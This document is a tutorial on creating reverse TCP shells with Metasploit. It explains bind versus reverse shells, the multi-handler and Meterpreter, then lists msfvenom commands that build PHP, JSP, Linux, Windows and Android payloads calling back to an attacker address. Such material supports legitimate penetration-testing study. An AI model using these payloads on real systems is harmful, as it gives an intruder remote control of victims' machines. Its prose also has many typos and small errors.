Reverse TCP shell with Metasploit

Metasploit is an awesome tool which is. It can automate the exploitation process, generate shellcodes, use it as a listener, etc. I hope to start a tutorial series on the Metasploit framework and its partner programs. So in today's tutorial, we are going to see how we can build a reverse TCP shell with Metasploit. For example, we use msfvenom to create a web shell in PHP and use Metasploit to get the session. It can create a reverse TCP connection to our mashing.

Reverse TCP vs Bind TCP shell

First of all, let's clarify what is a reverse TCP shell, What is a bind shell and how they work. In both of these situations, there is an Attacker mashing and a victim server.

In a reverse shell, we open a connection from the victim server to the attacker's machine. The attacker's machine is waiting for an incoming connection from the victim. Therefore it is also known as the lister. When the lister receives the TCP connection, it serves as a shell to access the victim server. That shell can be used to gain control over the victim machine. Since the connection is from the victim side to the attacker side it is called a revere shell.

A bind shell is another type of shell that allows a remote user to access and control a computer system over the network.

In this type of attack, the attacker sets up a listening program on a victim's machine. That listener is waiting for an incoming connection from the attacker. The listening program is running on a specific port on the victim's system. The attacker connects to the victim's system by running a client program that connects to the listening port.

The main difference between a bind shell and a reverse TCP shell is the direction of the connection. In a bind shell scenario, the victim computer is listening on a specific port, and the attacker connects to it, while in a reverse TCP shell scenario, the attacker is listening on a specific port, and the victim computer initiates the connection.

What is multi-handler?

The Metasploit multi-handler is an exploit module in Metasploit that allows an attacker to handle multiple connections from different payloads that are executed on multiple victim machines.

The multi-handler is typically used in conjunction with a payload that establishes a reverse connection to the attacker's machine, such as windows/meterpreter/reverse_tcp. Once the attacker has set up the multi-handler, any victim machines that execute the reverse TCP payload will establish a connection with the attacker's machine.

When a victim machine connects to the multi-handler, the Metasploit framework will automatically assign a session ID to the connection and the attacker can use various Meterpreter commands to interact with the victim machine. The multi-handler will maintain a list of all active sessions and provide an interface for the attacker to switch between sessions or interact with multiple sessions at the same time.

What is metepreter?

"Meterpreter" is a post-exploitation tool that is part of the Metasploit Framework. It is a powerful payload that can be delivered as part of an exploit to gain remote access and control over the compromised system. There are various functions such as capturing screenshots, stealing passwords, manipulating files, and pivoting to other systems on the network.

Meterpreter has several features that make it popular with penetration testers and attackers. For example, it provides a command shell with many built-in commands, as well as the ability to spawn additional sessions, migrate to different processes, and evade detection by antivirus software.

Therefore in our tutorial, we are going to use the meterpreter as the payload of our attack.

What are LHOST and LPORT?

LPORT and LHOST are parameters used in the reverse TCP connection to specify the listening port and listening host respectively. The victim machine connects to the attacker machine via this connection details.

In our case we are going to use meterpreter as our payload. Threfore, once the exploit is successfully executed on the victim machine, the Meterpreter payload will establish a reverse TCP shell connection back to the attacker's machine on the specified LHOST and LPORT.

Setting LHOST, LPORT, and Payload

The selected exploit may require some values as parameters. Before we launch the attack, we have to set them. We can get to know which options are required with the help of the command "show options".

Set the LHOST parameter to the IP address of the attacker's machine.

set LHOST 192.168.0.2

Set the LPORT parameter to the port number that the attacker wants to listen on for incoming connections:

set LPORT 4444

set payload windows/meterpreter/reverse_tcp

Once the exploit is successfully executed on the victim machine, the Meterpreter payload will establish a reverse TCP shell connection back to the attacker's machine on the specified LHOST and LPORT. The attacker can then use various Meterpreter commands to interact with the victim machine, such as gathering system information, running commands, or executing code on the victim machine.

What is Msfvenom?

Msfvenom is a tool in the Metasploit Framework that allows an attacker to create customized payloads that can be used to exploit vulnerabilities in target systems.

Msfvenom supports a wide range of platforms, architectures, and formats, such as windows, linux, android java etc. It allows the attacker to specify various parameters, such as the type of payload, the target platform and architecture, the communication protocol, and the encoding format.

Msfvenom can generate payloads for many types of exploits, including memory leaks, buffer overflows, command injections, remote code execution etc. It can also generate payloads that establish reverse shells or create Meterpreter sessions.

Generating the exploit using Msfvenom

First, we use msfvenom for creating our shell. Following is the syntax for generating an exploit with msfvenom.

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST=192.168.56.1 LPORT=555

Here we have used the PHP environment for demonstration purpose. In next section we can see how we can use msfvenom for other varus platforms too.

We have supplied many arguments for the msfvenom tool. Let see what they do.

The flag -p stands for the payload. It specifies which payload we want to use. Here we have used the Meterpreter as the payload. we can get the list of available payloads using the command msfvenom --list payloads. In the above example, you can see the payload php/meterpreter_reverse_tcp is selected.

Next the flag -o is used to specify the output format. We have specified shell.php. Therefore our output file will be saved as shell.php.

In the following section, I have listed out some payload types we use often.

Web servers

A web server may use PHP or JSP, Javascript, etc as its architecture. In the above example, we saw how we can generate a PHP shell.

What about a JSP server? We can build a web shell as a JSP file and try to upload it. So we want to use "java/jsp_shell_reverse_tcp" as our payload and the output file type should be ".jsp".

msfvenom -p java/jsp_shell_reverse_tcp -o shell.jsp LHOST=192.168.56.1 LPORT=555

Linux platforms

If we want to attack a Linux server we can use "linux/x86/meterpreter/reverse_tcp" as our payload. Also we can use ".elf" as the output file.

msfvenom -p linux/x86/meterpreter/reverse_tcp -o shell.elf LHOST=192.168.56.1 LPORT=555

Windows mashings

For Windows, we can use meterpreter as the payload. So we should select "windows/meterpreter/reverse_tcp". As you know the extension should be ".exe".

msfvenom -p windows/meterpreter/reverse_tcp -o shell.exe LHOST=192.168.56.1 LPORT=555

Android devices

We know that Android is the world's most popular mobile operating system. Metasploit has various payloads for Android. vCommonly we use "android/meterpreter_reverse_tcp" to attack Android devices. The output file type should be ".APK".

msfvenom -p android/meterpreter_reverse_tcp -o shell.apk LHOST=192.168.56.1 LPORT=555

Launching the exploit

As the final step, we can start the listening with the command run. Then it will wait for an incoming connection from the victim machine.